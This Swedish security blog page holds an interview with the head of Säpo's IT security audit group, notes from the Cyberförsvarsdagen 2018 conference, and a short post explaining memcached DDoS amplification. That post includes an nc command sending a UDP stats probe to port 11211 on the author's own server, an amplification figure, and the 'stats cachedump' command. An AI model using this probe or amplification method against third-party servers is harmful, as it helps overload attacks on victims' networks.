Så jobbar Säkerhetspolisen med cybersäkerhet

Händelserna runt Transportstyrelsen och den nya totalförsvarsplaneringen har gett otroligt stort fokus på säkerhetsskydd i samhället. Jag har träffat Johanna som är chef för en av Säkerhetspolisens mest spännande grupper, gruppen för informationssäkerhet och bevissäkring i IT-miljö. Hon ansvarar för den tekniska verksamheten inom säkerhetsskydd, som är ett av Säkerhetspolisen verksamhetsområden.

❤ Stöd Kryptera.se via Patreon >

Alla aktörer som omfattas av säkerhetsskyddslagstiftningen, exempelvis om man har system som hanterar hemliga uppgifter eller har verksamhet för betydelse för rikets säkerhet, kan bli föremål för granskning av det team av IT-säkerhetsspecialister som Johanna är chef över. Uppdragen kan komma in som förfrågningar eller så utförs de som en del av en tillsyn där flera specialister från Säkerhetspolisen tillsammans granskar ifrån olika säkerhetsperspektiv, exempelvis fysiskt skydd eller registerkontroll av personal. ”En fullgod IT-säkerhet är beroende av att ett systematiskt säkerhetsarbete genomförs” säger Johanna, ”om säkerheten brister i någon av de andra delarna kan det i värsta fall innebära att de tekniska säkerhetsfunktionerna kan kringgås”.

Johanna berättar att en säkerhetsgranskning inleds med att man diskuterar uppdraget med aktören vars system ska granskas. Det är viktigt att det finns en analys av var den mest skyddsvärda informationen eller funktionerna finns. I vissa fall riktas granskningen emot ett särskilt system eller applikation, men det är även vanligt att IT-säkerhetsspecialisterna utför breda tester på hela organisationers IT-miljö för att få en inblick i hur säkerhetsarbetet ser ut som helhet.

Penetrationstest kan ingå, och Johanna berättar att de har stor framgång när det gäller penetrering av IT-system. ”Granskningsgruppen agerar som en kvalificerad angripare skulle gjort. De verktyg som används är oftast publikt tillgängliga, men ibland använder vi egenutvecklade verktyg. Att skaffa sig full kontroll över en myndighets infrastruktur brukar oftast bara vara en tidsfråga och exploits används väldigt sällan. Det räcker att utnyttja mänskliga misstag och felkonfigurationer.”

Syftet med gruppens verksamhet är förebyggande IT-säkerhet, och att penetrera ett IT-system är endast en del av uppgiften. För att få ett bra resultat behöver gruppen titta på helheten då uppgiften är att hjälpa aktören att bli bättre och inte identifiera individuella brister eller hänga ut någon enskild. Gruppen utför även mer specifika applikationstester likväl som att ge stöd och råd till myndigheter och företag vid exempelvis dataintrång. Kryptoforcering kan också förekomma när det behövs.

Verksamheten som de bedriver regleras i säkerhetsskyddslagstiftningen. ”Regleringen är enbart ett ramverk” säger Johanna, ”de måste tillämpas på ett kompetensdrivet sätt. Att köpa en dyr brandvägg löser inte hela problemet, den måste konfigureras och administreras rätt.”

Det är utmanande att reglera it-säkerhet” fortsätter hon, ”mycket går inte att reglera i föreskrifter eftersom teknikutvecklingen gör att området hela tiden är i rörelse. Dessutom är it-säkerhetsarkitektur ett system av åtgärder och avvägningar som får bäst resultat genom ett systematiskt och kvalitativt säkerhetsarbete. Det kan vara svårt att reglera, så vår manuella granskning är därför otroligt viktig”.

De som jobbar med Johanna är IT-forensiker, penetrationstestare, seniora rådgivare och specialister på säkerhet inom cyberområdet. Anställda på Säkerhetspolisen kan lägga en hel del tid på verksamhetsutveckling och egen kompetensutveckling såsom labbande och gå kurser. ”Den personliga kompetensen hos medarbetarna är vår viktigaste förmåga, så det känns viktigt att ge gruppen möjligheter att ha en fortsatt hög utvecklingstakt. Utbyte genom samverkan och de praktiska erfarenheterna av att arbeta mot samhällets högsta skyddsvärden ger oss också insikter och erfarenheter som är svåra att få på något annat sätt” förklarar hon.

De som jobbar med IT-forensik i gruppen jobbar nära de andra verksamhetsområdena på Säkerhetspolisen, exempelvis kontraspionage, författningsskydd och terrorism. Det innebär att de stödjer i både underrättelseärenden och utredningar. Forensikerna måste vara väldigt operativa eftersom de deltar i husrannsakningar som vanligtvis resulterar i digitala beslag vars innehåll därefter ska tas fram. ”Svårigheterna för en forensiker rent tekniskt är att lyckas ta sig in i olika system, extrahera och processa stora datamängder som sedan ska pusslas ihop” förklarar hon.

Det händer nya saker varje dag och många gånger är det forensiska arbetet kopplat till händelser som får stora nyhetsrubriker. Just inom IT-forensiken så sker även en hel del intressant utveckling såsom IoT, drönare och bilar. Därför är det lika viktigt att forensikerna får utrymme för egen utveckling, labbar och att specialisera sig inom vissa delar av IT-forensik och dyka djupare inom dessa områden.

Vi har en väldigt spännande och högkvalitativ verksamhet, men vi ska fortsätta att utvecklas. Säkerhetsskyddsenheten kommer genomföra ett utvecklingsarbete av it-säkerhetsområdet de kommande åren, vilket kommer att ge oss både nya mål och metoder. Det är riktigt kul att få vara en del av en verksamhet som faktiskt gör skillnad.

Johanna är ett fingerat namn och heter egentligen något annat.

Just nu söker Säkerhetspolisen personal till följande två tjänster:

Memcached som DDoS-förstärkare

Rapid7 memcached servers

För ett tag sedan så rapporterade Rapid7 samt CloudFlare att cache-tjänsten memcached används för att utföra överbelastningsattacker. Genom att skicka en kort UDP-förfrågan till port 11211 så returneras ett längre svar. Och eftersom det är UDP så kan källan förfalskas.

Jag testar på en egen server som lyssnar till localhost på UDP samt TCP port 11211:

echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211

Och får då ett relativt långt svar tillbaka gällande statistiken för memcached. När jag testar att skapa en stor nyckel med SET och sedan hämta den med GET på 14 bytes så får jag ett svar på cirka 750kB. Vilket är en amplifieringsfaktor på cirka 51,200 gånger.

❤ Stöd mitt bloggande via Patreon >

Läser jag på mer om memcached så finns det även en odokumenterad funktion som heter  stats cachedump. Denna kan returnera 1 eller 2 MB data från memcache-indexet men behöver hitta rätt slabs_id vilket är 2 i detta fall:

stats cachedump 2 0 0

Källa och bildcredd: Rapid7, CloudFlare

Cyberförsvarsdagen 2018

Säkerhets- och Försvarsföretagen (SOFF) ordnar tillsammans med MSB och Försvarsmakten årligen ett konferensevent – Cyberförsvarsdagen. I år 14 februari med tagline ”Cybersäkerhet i nationens intresse”. Enligt SOFF: ”På deltagarlistan finns bland annat cirka 140 personer från ett 20-tal myndigheter, cirka 120 personer från ett 50-tal företag samt en stark uppställning från bland riksdagen och departementen.”

Jag heter Robin von Post och blev utlånad av Sectra, utsänd av Kryptera.se för att sitta i publiken och grubbla och fånga essensen av det som presenterades.

INTRODUKTION

Nils Schwarz, stf GD MSB

  • Ledningarna har fått verkligen fått säkerhet på sina bord!
  • En Norgehistoria – Det har gjorts ett intrång med administrativ behörighet och ”kontaminerat” ett norskt sjukhus. Men man kan inte stänga ner sjukhuset och få bort intrånget. Man är för beroende av driften.
  • Vi måste ta in i våra riskmodeller att störningar kan användas för att distrahera
  • Säkerhet är en löpande process men vi jobbar väldigt hårt med att öka den grundläggande nivån på säkerhetsnivån – En bra bas att stå på. Viktig uppgift för MSB.
  • Det är viktigt med samverkan – Sverige är ett litet land. Det är bra – för då kan vi bygga tillit!

Fredrik Robertsson, CIO Försvarsmakten

Administrativa – Informationssäkehets-strategi fastslagen.

Även praktiska saker pågår inom försvarsmakten.

Regleringsbrevet sedan ett antal år – Jobbar hårt med uppdraget att bygga ett cyberförsvar.

SPELPLANEN

Inledning, Peter Hultqvist, Försvarsminister

Sverige är ett av de mest uppkopplade i världen. Vilar på digitala grunder.

Cyberattacker med typiskt politiska mål. Val o elförsörjning o finansiell.

Även Sverige har drabbat av attacker (Media – enskilda företag)

Med grund i Försvarspolitiska beslutet 2015 byggs en robust cybersvarsförmåga.

Denna skall kunna verka både i fred och krig. FM & FRA jobbar gemensamt för att skapa det som kallas – ”Aktiv förmåga”.

Kritisk infrastruktur – drar nytta av men blir även sårbar på grund av teknikutvecklingen

Arbetet i att skydda ”det MEST skyddsvärda” initieras i Regleringsbrev 2018

Säkerhetstjänst – Signalspaning – Försvarsmakten

FRA kan under en månad se 10000 ”Aktiviteter med skadlig kod som kan härledas till de aktörer som FRA följer”.

Vi är utsatta för informationsinhämtning kring Sveriges Försvarsförmåga, Politiska intentioner, Svensk forskning

Där ÄR fortfarande för lätt att lyckas med Spear Phishing o Denial of Service-aktiviteter

Ännu mer allvarligt – slå ut kritiska funktioner i samhället!

Aktiva förmågan bidrar till en så kallad ”tröskeleffekt”

Hultqvist pushar för värdet av Sensorer för att detektera angrepp

Militära försvaret BEROENDE av att det civila samhället stöttar. Viktigt konstaterande – svårare att dra gränsen mellan civil/militär – Stärkt Totalförsvar viktigt!

Säkerhetsskyddsförordningen har förändrats så att Försvarsmakten eller Säkerhetspolisen skall involveras när man skall utkontraktera verksamhet.

Förändringstakten är exceptionell! Men viktigt att se VAD som ändras och vad som består!

Fundamenta kvarstår i försvarspolitiken – Stater har alltid arbetat med informationsinhämtning o påverkan för att på så sätt uppnå strategiska o taktiska fördelar. Cyber är bara en ny domän.

Antagonistiska aktörerna har ALLTID funnits där!

Hög kompetens är en svensk styrka!

Moderator: Vad är kritisk framgångsfaktor i offentlig privat samverkan

PH: Medvetenhet föder aktivitet!

Moderator: Valår – Specifika aktiviteter?

PH: Bygga stegvis o långsiktigt. Stabilitet för att nå rätt resultat.

Richard Oehme, Director, PwC, tidigare enhetschef MSB – Upptakt & Nuläge

Cybersäkerhet har gått från 10 till 4:e plats på ledningsnivån i en årlig PwC-undersökning.

IT-utvecklingen pågår i expressfart – Vidtagna säkerhetsåtgärder hänger INTE med. Det kräver en ny inställning! Tar upp tex. avbrott 2016 i Flygtrafikledningen och i sjukhusmiljöer, apotekssystem.

Richard pushar för DNSSEC – Karta över Sverige. Det ser bra ut – OK, men inte bra.

Pushar även för MSB-kartan från CERT.se – Infekterade datorer i Sverige.

Detta är en fråga om Grundhygien i samhället!

Listar hotaktörer:

  • Nationalstater
  • Hacktivister
  • Organiserad Brottslighet
  • Cyberterrorister
  • Insiders

Upseendeväckande attacker:

2010 – Stuxnet – Anden släpptes ut ur flaskan

2017 – Cloud Hopper – Även Sverige drabbat

På Darkweb finns sedan några år  – Steg för steg-verktyg för att bygga ditt skräddarsydda attackkod – visar skärmbilder.

Vi har även viktiga globala beroende – Undervattenskablar! Vi har haft störningar på dessa både pga naturkatastrofer och mänskliga. Taiwan 2006 – Stor jordbävning förstörde en mängd undervattenskablar

Sabotage utanför Afrika. Kanske är en Svart Svan? Hur mycket av samhällskritiska funktioner skulle sluta fungera?

Riktar blicken mot Cyber Supply Chain-risker – Antagonister kommer rikta sig på de svagheter som finns i denna kedja!

2007 – Operation Orchard – Syrien

https://sv.wikipedia.org/wiki/Flygbombningen_av_Al_Kibar-anl%C3%A4ggningen

6 september – Israel hackade in och injicerade falska radarbilder i det syriska luftövervakning för att ostört kunna bomba bort en fabrik som man trodde byggts för att anrika uran.

Min något dystra bild – Om någon VILL stänga ner Sverige – så KAN de göra det.

MEN vi är ett litet land som kan göra mycket tillsammans!

Måste även lösa upp knuten mellan privat o offentlig samverkan.

Erik Wennerström, GD Brå, Strategi och Avgränsning/Begränsning

Nationell Säkerhetsstrategi fyller drygt ett år! Signalerar – En robust förmåga hos försvaret

NISU-utredningen

Nationell strategi för samhällets informations- och cybersäkerhet

http://www.regeringen.se/rattsdokument/skrivelse/2017/06/skr.-201617213/

·       Prio 1

Säkerställa en systematisk o samlad ansats

·       Prio 2

Öka säkerhet i nätverk, produkter o system

·       Prio 3

Stärka förmågan att förebygga, upptäcka o hantera cyberattacker o andra IT-incidenter

(NIS-direktivet)

·       Prio 4

Öka möjlighet att förebygga o bekämpa IT-relaterade brottslighet (Inhämtning)

SE3-centret på polisen

·       Prio 5

Öka kunskap o främja kompetensutveckling

·       Prio 6

Stärka det internationella samarbetet!

Kommenterade ang toppmötet i DAVOS

Nationella Strategin: Sverige skall vara en ledande digital aktörer i Världen.

Internationell undersökning är Sverige på plats 3 i hur bra vi är på att ta till oss och använda IT.

Detta är baserat på perception – hur ANDRA länder ser på Sverige.

DOCK: I kategorin ”Countries best prepared agains Cyber attacks”

2016 – Vi fanns inte ens på kartan.

2017 – plats 17! Åtminstone tycker andra länder att vi har börjat agera på detta plan.

Sedan 1990 har statens inflytande ”direkta maktutövning” monterats ner pga

·       Kommunalisering – devolverat ner på komunal nivå

·       Bolagisering av statlig verksamhet

·       Privatisering av utförande (upphandling)

·       Juridifiering (domstolsbeslut istf regeringsbeslut)

·       EU (nästa område som glidit ur regeringens grepp)

Fråga: Varför har inrapporteringen till CERT.se MINSKAT sedan sedan obligatoriska kravet på incidentrapportering trädde i kraft?

Erik: Passar vidare denna fråga till MSB

MSB: Pass

Hosuk Lee-Makiyama, ECIPE, Ekonomiska effekter av spionage

Fakta: ALLA länder spionerar.

Dock – Få länder som spionerar på kommersiella verksamheter i syfte att ge informationen till sina lokala konkurrenter. Detta har blivit handelspolitisk fråga! Mn har gjort beräkningar att detta kostar 55 miljarder euro per år. Hur kan vi veta detta? STASI-arkiven ger oss vilka ekonomiska effekter spionage ger.

Kina kan öka sin export med 30% mha Spionage.

Konstaterade fall i Europa – 12 fall – Tillverkning Kemikalier, Biltillverkning mm Skruv&Mutter. Det är ”vanliga” industrier som drabbas.

8 från Kina

2 från Ryssland

Vad leder sanktioner och åtgärder till?

Kina stänger ner sin marknad! Och Europa åker med på samma badvatten som USA.

Panel – SÄPO/FRA/FM – Hotbilden idag o vikten av att samverka!

Dag Hartelius, GD FRA

Fredrik Robertsson CIO FM

Charlotte von Essen, bitr GD SÄPO

DH: Hotet utvecklas o växer. Efterfrågan på stöd från FRA från den mest skyddsvärda verksamheten ökar.

CvE: Säkerhetsskyddet – Vi har 600 verksamheter som vi har ansvar o tillsyn över.

Vi ser framförallt 3 saker

·       Bristande säkerhetskultur

·       Otillräckliga säkerhetsanalyser – saknar insikt i vad som skall skyddas o hur

·       Bristfällig utkontraktering

DH: Cloud Hopper avancerat angrepp av en statsaktör.

Tyvärr så måste man sprida sina behörigheter – när man utkontrakterar.

FR: Samverkan. I praktiken?  På regeringens uppdrag möts o samverkar vi OFTA.

Detta bygger en medvetenhet o förståelse.

CvE: Samhället behöver jobba med:

·       IT- och Informationssäkerhet

·       Personalsäkerhet (man måst se till att man har lojal och kompetent personal)

·       Fysisk säkerhet

FR: Snabbhet! Det är ett problem vi behöver addresser. Vi är inte konstruerade för att hantera dessa snabba förlopp.

CvE: Måste nyttja vår GEMSAMMA kraft för att bemöta utmaningen.

FR: Viktigt att hitta modeller för att ta tillvara på spetskompetenser i privat verksamhet!

CvE: Valår – Erfarenhet från tidigare valrörelser tas i beaktande. SÄPO har uppdrag att skydda förtroendet för valprocessen och att det kan genomföras på ett säkert sätt.

Öka medvetenheten runt information kan påverkas och hur man skall skydda sig.

DH: Påverkansoperationer. Blanda annat informationsstölder – vi stöttar Säpo!

Vi måste även värna den svenska kryptoindustrin!

FR: Lägstanivån behöver hissas upp! Framförallt kring samhällskritiska verksamheter.

FR: Plikt är EN väg in för att lyckas med kompetensförsörjning – men vi måste se bredare på utmaningen!

UNDER ATTACK

Pål Wrange, Professor Stockholms Universitet, Risker verktyg och politik – en internationell överblick

Som Cybermedborgare ser man dock inte världskartan med gränser.

Måste sätta Regler o Normer o ansvar för stater!

Medel för samarbete – Bindande o icke-bindande regler – Informellt samarbete o Trakter

Det är dock mycket vaga regler o oklart hur nuvarande regler kring suveränitet i cyberrymden

Kan man svara på ett cyberangrepp med ett kinetiskt?

Är påverkansoperationer legala?

Finns en mängd besvarade frågor i cybervärlden!

GGE klargjorde vissa grunder, MEN det blev inte konkret.

Det man dock fastslog 2013 var att Folkrätten GÄLLER

INGA Internationella traktater – saknas Bindande avtal!

Talar tyst om vad man anser…

Folkrätten skapas genom att ”Ngn gjorde så här” – Är det OK? – den diskussionen pågår inte.

Spioneri KAN utgöra suveränitetskränkningar – men otydligt.

Problem uppstår vid attribuering. Man må ha välgrundande misstankar.

Tex Estland 2007. Hade Ryssland ett sekundärt ansvar för att privata aktörer inte attackerar?

Vad är det då som pågår:

·       FN: Group of governmetal Experts (GGE)

Rapport 2013 – men 2017 strandade dessa diskussioner pga konflikter mellan stormakter och definition av Terrorism. Behovet kvarstår dock.

·       International Code of Conduct – Rysslands förslag

·       FN har Internet Governance Forum (EJ politiskt)

·       ITU – Tekniskt

·       UNESCO

·       G7/G20 – informella organ – diskuterar cybersäkerhetsfrågan på sistone

·       NATO – 2014 Cyberförsvarspolicy

·       2016 – EU/NATO avser öka koordineringen – Konkret men ej normskapande.

·       Tallinnmanualen – dock:

Folkrättsexperter inbjudna – akademisk produkt.
Refereras till pga i brist på annan tolkning av folkrätt i cyberrymden

·       OECD

·       OSSE – 2013  Ministerråd antog förtroendeskapande åtgärder. FÖRTROENDE! Arbetar med att konkretisera o realisera. Feature är att samarbetet med Ryssland fungerar här

·       EU

Cyber Diplomacy Toolbox

·       GCSC (Holländskt initiativ)

·       Global Conference on Cyber Space

·       Privata – Microsoft

En Digital Genévekonvention

Attribueringsinstutition

Avslutande:

Det ÄR en fragmenterad bild

Gemensamt

Man vill ha ett välfungerande Internet

Motsättningar

USA Ryssland Kina – Stormaktskonflikt

Skiftande teknisk kapacitet

David Olgart, Utvecklingsledare FM, Artificell Intelligens

Tittar på beslutsstöd mha AI – FOI hjälper till

Linköping – Tex automatisera konfiguration o styrning av CRATE (Cyber Range)

Överförd hotbild i pga pågående insatser. Personal på plats påverkas via social medier!

Cyberförsvar syftar till en Tröskeleffekt.

Bild på Cyberförvars-AI: Gulmarkerat (juli 2017)

·       AGI

·       AI for IT Operations

·       Deep Learning

·       Machine Learning

·       Predictive Analytics

Utmaningar i försvarsmakten!

·       Man måste bygga system som klarar sig utan kopplingar till uppkopplade system : On Prem-lösningar!

Behov

·       Hjälp av industrin

·       Moderna ledningssystem o effektiva

Konsekvenser

·       Genomgripande digitalisering (men med hänsyn till skyddsbehov) ger automatisering

·       Omdömeslöst AI! :o

·       Dokumentstyrt till Datacentrerat

Vägen framåt

·       Processer – Personal – Teknik

·       AI för drift o förvaltning

·       AI för upptäckt av tidigare okända sårbarheter i hård o mjukvara

·       Kompetensförsörjning viktig

·       Prov o Försök för att se vad vi har för status – Digitala Stabsassistenter!

Paneldiskussion

David Olgart, FM

Alexandra Larsson, Combitech

Robin Blokker, FRA

Christer Samuelsson, CGI

Moderator: Hur bygger vi en proaktiv förmåga?

RB: Jag är ju ute och säkerhetsgranskar ganska mycket. Det vore bra om vi fixar 90-talets problem först!

Moderator: Hur förbättra förmågan att upptäcka om man blir hackad?

RB: Bashygien o loggar!

Moderator: e-kronans införande vad ser vi för utmaningar?

RB: Jag hoppas vi har kvar riktiga pengar ”just in case”

Moderator: Vad kommer ett fullt utbyggt TDV att bidra till?

RB: Öka detekteringsförmågan av de MEST kvalificerade hoten mot de MEST känsliga verksamheterna.

Moderator: Gynnar AI angriparen eller försvararen?

DO: Vi brukar titta på att Angripare arbetar i grafer – försvarare i checklistor

RB: Datorprogram som krigar. Den som har bäst program o programmerare vinner.

Moderator: Vad är ni mest rädda för?

CS: AI får inte sätta behörigheter!

AL: AI skall ligga i linje med människors värderingar o inte i konflikt!

RB: Sverige inte vaknar i tid. Underminerar oss NU i lågintensivt

Och vi har en utmaningar! Svag förmåga pga sämre möjlighet till central styrning. Ref till Erik Wennerströms erodering av statens direktstyrningsförmåga – gör det svårt för cybersäkerheten!

RB: Som uppföljning på Cloud Hopper skrev vi en rekommendation – Bland annat pekar vi på att säkerhetsansvaret inte KAN delegeras. Om du släpper in ngn annan i ditt hus – se till att du har koll på va de gör. Övervakning!

Sarah Backman, Secana, När krisen är ett faktum – Cyberkrishantering

Ett tal med fokus på:

·       Reaktiva Åtgärder

·       Managementfokus

·       Krishantering

·       Effekten av attacken

·       Krishanterande grupper

Definition v Cyberkris

Cyberkris = Cyberincident + Karaktärsdrag Kris

Fall av Cyberkriser

·       Estland 2007 – Cyber Warfare. Överbelastningsattacker. Banker, Media, mm
Politiskt motiverade

·       Ukraina 2015 – Visade på sårbarheten i energisektorn
Möjligt test av ”sårbarhet o respons” från statlig aktör

·       WannaCry 2017 – Sjukhus o Vårdsektorn hårt drabbade. Basal cyberhygien.

Gemensamt:

·       Suddar ut gränser mellan mil-civ – geografiska – sektorer, nivåer

·       Utvecklats pga dåligt cyberförsvar

·       Motivation till ökade preventiva åtgärder först i efterhand!

Den generella Krishanteringsprocessen

·       Detection

·       Sense-making

·       Decision-making

·       Coordination

·       Meaning-making

·       Communication

·       Accountability/Learning
Detection/Sense-making

Responsgrupper tillkallas alldeles för sent – Skalar inte upp i tillräcklig omfattning.

Det gäller allmänt i kris men specifikt cyberkriser.

Decision making & coordination

Vem ÄGER krisen? Spänner över många aktörer

Beslutsfattare förstår inte tekniska aspekter

Erfarenhet saknas

Gemensamma ramverk saknas

Meaning-making/Communication

Svårt rama in o beskriva krisen

Hitta bra medel för kommunikation svårt

Frame:as i politiskt syfte

Potential

·       Förståelse för att det inte är en fråga OM utan NÄR en cyberkris inträffar

·       Preventivt arbete är värt det!

·       Ökad medvetenhet och cyberhygien av största betydelse

·       Ökat engagemang från ledning – Top-Down

·       Ökad Övningsverksamhet

·       Mer forskning om mänskligt o Mgmt o samverkan – Komma ikapp fokus på teknik

·       Bättre strukturer för informationsdelning nationellet/internationellt

Pia Gruvö, MUST, Krypto

Krypto ÄR annorlunda

·       Ett dåligt implementerat krypto – lämnar inga spår. Man kan vara avlyssnad utan att det märks!

·       Man talar inte OM för varandra när man lyckats knäcka systemen.

·       Man kan inte täppa till det som skickats historiskt om man blivit knäckt.

·       Svårt område att samarbeta på!

·       Man kan inte granska in säkerhet i efterhand!

Säkerhetsskyddsförordningen (1996:663)

·       Hemliga uppgifter får endast krypteras med kryptosystem som godkänts av Försvarsmakten

Kryptosystem består av

·       Kryptoapparat

·       Kryptonycklar

·       Regelverk

Top Secret – Skydda gigabitsänd information i 95 år framåt mot statsfinansierade aktörer

Man tittar på:

·       Algoritm/protokoll

·       Nyckelhantering

·       Röd-Svart-separering

·       Design

·       Hård/Mjukvara

·       RÖS-skydd

·       Tamper-protection

·       Utvecklingsprocesser

·       Assurans

·       …

En angripare skall hitta en nål i en höstack – När vi godkänner ett kryptosystem för rikets säkerhet skall vi garantera ”Höstacken har INGA Nålar”!

Vi jobbar med att ta fram ett helt nytt system – Meddelandekrypto – SG R SG TS/S

Moderator: Vilka utmaningar har vi framåt?

PG: Hitta processer så att vi kan hänga med tekniskt!

Samt göra det så användarvänligt som möjligt!

Carolina Dackö, Mannheimer Swartling, Tandlöst regelverk mot ekonomiskt Spionage

Internationell Handelsrätt – Legitim handel av varor o tjänster.

Regelverk mot Ekonomiskt Spionage

Det är RÄTT oreglerat.

Nationellt Säkerhetsintresse används för exportkontroll/importkontroll – Foreign Invest Screening

Tyskland Italien Frankrike – Reglemente på EU

Chinese Intelligence Law

Lagstiftning kom i juli. Lagkrav på företag att hjälpa till med informationsinhämtning till kinesiska myndigheter. Luddigt skriven men vi VET att den är bred i sin tillämpning.

En förlängd arm av staten in i det privata.

Ekonomiskt Spionage, angripbart?

Är spionage lagligt – eller är det ”Inte olagligt”… Otydligt reglerat.

Handelssanktioner skulle kunna användas som motåtgärd.

Som alltid: Tekniken ligger långt framför oss – Juridiken trampar på att hitta tolkningar o definitioner.

Centraliserad Myndighet viktigast! Få lite tänder i lagstiftningen!

Panel: Hur Höjer man säkerheten i sin organisation?

Patrik Ahlgren, FM Cybersektionen

Jacob Henricson, Foreseeti

Sara Backman, Secana

Moderator: Vad är det värsta som kan hända? Vad skall vi skydda?

SB: ”Major Breakdown” i Kritisk Infrastruktur. Hur länge klarar en större stad sig utan el?

Moderator: Vad är Försvarsmaktens roll kring säkerhet i civila samhället?

PA: Vi inriktar oss på de resurser som vi är beroende av för att kunna lösa VÅR verksamhet – inkluderande civil infrastruktur.

Moderator: Hur kan vi lyckas få bättre samverkan mellan offentlig o privata aktörer?

JH: Vi ser att Holland o UK har långtgående samarbeten mellan privat offentlig verksamhet!

PA: Tycker att vi skall närma sig andra länders lösningar med försiktighet. Vi har olika konstitutioner, olika ekonomiska muskler. Vi måste ta de lösningar som är bäst för OSS.

SB: Det måste vara en dubbelsidig vinst i samarbetet. Både parter måste se fördelen.

Moderator: Hur Skyddar man sin organsation?

SB: 1) Avsätt Resurser 2) Utbilda 3) Öva

JH: Ett stort slag i luften för sunt förnuft. Debattartikel i Svenskan i höstas. Kontroll på vad som är skyddsvärt! Alla inblandade vara medvetna om vad vi skyddar. Valprocessen –

PA: Satsa inte ALLT på en lösning – är du Bank ha två betallösningar. Kontinuitetsplanering/Reservmetoder – Om det blir svart – vad gör du DÅ?

Moderator: Vem skall göra detta?

PA: Varje myndighet o aktör har ett ansvar att detektera och skydda sin verksamhet!

JH: Varje Chef.

SB: Ytterst Ledningar o chefer. Även varje medarbetare måste känna sitt ansvar.

Moderator: Hur mycket för säkerhet kosta?

PA: Vilka värden skall skyddas? Analysen måste göras. Åtminstone.

SB: Kontinuitetsplanering – sätta en Riskaptit

JH: 4-7% av budget på sin IT-säkerhet (enligt rapporter från tex. PwC). Men viktigt att veta VAR man satsar?

ELEFANTEN I RUMMET

Björn Palmertz, CATS, FHS, Den svagaste länken – Social engineering och människans psykologiska processer ur ett påverkansperspektiv

Människor är kognitiva snåljåpar

90-talet bytte man till synen att de troligare är Motiverade taktiker.

Flexibelt olika tekniker – Motivation o målsättning ger olika strategier –

Tidsbrist, Mental belastning, Irrelevant information, Låg kunskapsnivå -> Snabba tankar med låg precision

Syftet med Social Engineering: Påverka någon att göra en handling som gynnar påverkaren.

Tips – Kurs: Influence and Social Power

Grundstrategier:

·       Ömsesidighet – Vi får ngt o vill ge tillbaka

·       Åtagande o konsekvens – Fortsätter tycka göra som vi gjort. Annars skulle samhället bli så skumt om alla byter åsikt o beteende hela tiden.

·       Socialt Bevis – Större tillit till de som verkar dela dina värderingar

·       Tycke – Uppskattning. Gemensamma drag – Positivt

·       Sällsynthet – Låg tillgänglighet/Låg kvalitet. Sällsynta värderas HÖGRE

·       Auktoritet – De flesta följer auktoritet. Både hierarkiskt o expert. Språkbruk/Titlar används

Finslipa processer för att finna även svaga signaler på ett pågående angrepp

EN åtgärd för att stävja social engineering: Kommunicera! En Öppen dialog ger en beredskap. Och en möjlighet att tänka till.

Ann-Marie Eklund Löwinder, Internetstiftelsen Sverige, Outsourcing – Judas eller Frälsaren

Vi MÅSTE göra analysen.

Många myndigheter saknar relevant upphandlings/beställar-kompetens!

Starka o självständiga IT-avdelningar – som inte vill ta hjälp.

RRV-rapporten: IT-kostnaderna särredovisas inte.

IT-projekt tar tid – generellt 18-24 månader

Välkomnar SÄPO:s samrådsfunktion vid utlokalisering av IT-verksamhet.

Vi måste skriva väldigt bra avtal o överenskommelser! Har ni inte frågat efter det kommer ni inte att få det.

Ställ krav på att man får göra en revision

Ställ krav på rapporter av incidenter/tester/drift

Ställ krav på avslutsprocess

UNDVIK risken att din molnleverantör blir ett Hotel California – Check in but never leave!

Om man RÅKAR göra rätt – så är det FEL

Man skall VETA att man gjort rätt.

Ha INTE Bråttom!

Panel: VÄGEN FRAMÅT

Åsa Lindestam (S) Hans Wallmark (M) Daniel Bäckström (C)

Åsa Lindestam (S)

Hans Wallmark (M)

Daniel Bäckström (C)

Moderator: Vilken plats har cyberfrågorna inom partiet idag?

DB: Den TAR plats. Det går fort.

HW: Ökar i Raketfart. Speciell talesperson. Incidentdrivet. Transportstyrelsen viktig händelse.

ÅL: Mitt parti höjer upp denna fråga på en hög nivå. Vi TROR vi förstår men de gamla tankarna måste förnyas. Nya lagar. Svåra frågor.

Moderator: Hur påverkar dessa frågor er till vardags?

ÅL: Beredningsmöte – Lämna telefoner o iPads lämnas i låsta skåp.

HW: Jag kör fortf med papperskalender

HW: Vi behöver ett Nationellt Säkerhetsråd med ett övergripande ansvar.  Svårt med starka myndigheter…

DB: Föreslagit ett närlingslivsråd för att kunna gynna en samverkan och informationsdelning.

HW: Vårt ansvar är att planera för Höjd beredskap o krig – kopplar till ALLA verksamheter – Delrapport 20 december. Öppna medvetenheten. ”Motståndskraft”

DB: Vart vill vi landa om 10 år? Inte bara se bakåt. Kompetensförsörjningen i alla olika storlekar av verksamheter. Kommunalt, privat, myndigheter.

ÅL: Vi i samhället behöver höja vår kompetens i allmänhet!

DB: signalera vikten av utbildning inom detta område!

HW: Det är en global konkurrens. Utbildningarna är fria för EU-medborgare. Och dessa delar vi

ÅL: Försvarsberedningen finns tankar kring hur styrkan i totalförsvaret hålls uppe. En svaghet är kommunerna.

DB: MSB måste sätta nivån för vad vi kan förvänta oss på kommunal nivå! Resursbristen är tydlig i det kommunala.

HW: Vid

·       Kris

·       Skymningsläge

·       Krig

Då går man till stadshuset.

Länsstyrelser o kommuner – Bygga upp kompetens givet försvarsöverenskommelser. Precis i startgroparna.

Vilken plats kommer Cybersäkerhet kommer få i kommande valrörelse

DB: Växande! Engangemang o insikter stärks. Gråzonsproblematiken har ännu inte diskuterats.

HW: Jag skulle gärna att det vore Nr 1 – MEN det realistiska är att det kommer avgöras kring inrikespolitiska frågor med det som är närmast vår vardag.

Charlotte Svensson, Statssekreterare, justitiedep, Makten reflektioner

3 år sedan SLL hade en Utpressningstrojan

2 månader senare receptsystem nere på Apoteket

Teknikutvecklingen och ökad internationalisering. Vårt moderna samhälle ÄR komplext.

Sverige – har ALDRIG satsat så mkt på att rusta upp!

Förra årets undersökning – I stort sett ALLA svenska använder Internet.

98% av 6-åringar uppkopplade

66% av svenskarna Swishar pengar.

Detta ger enorma vinster – men också utmaningar!

Nationella Strategin –

6 prioriteringar!

Detta Implementeras nu – regeringen har beslutat om uppdrag som bidrar till målen skall uppnås.

Tar upp NIS-direktivet och hur det även inbegriper privata aktörer!

SÄPOs veto tas upp kring utkontraktering

Imorgon fattas beslut om en ny säkerhetsskyddslag. Träder i kraft 1 april 2019.

Regeringen tar nya initiativ:

·       Nationell Kampanj mot småföretagare. Länsstyrelserna skall kunna stödja kommunerna

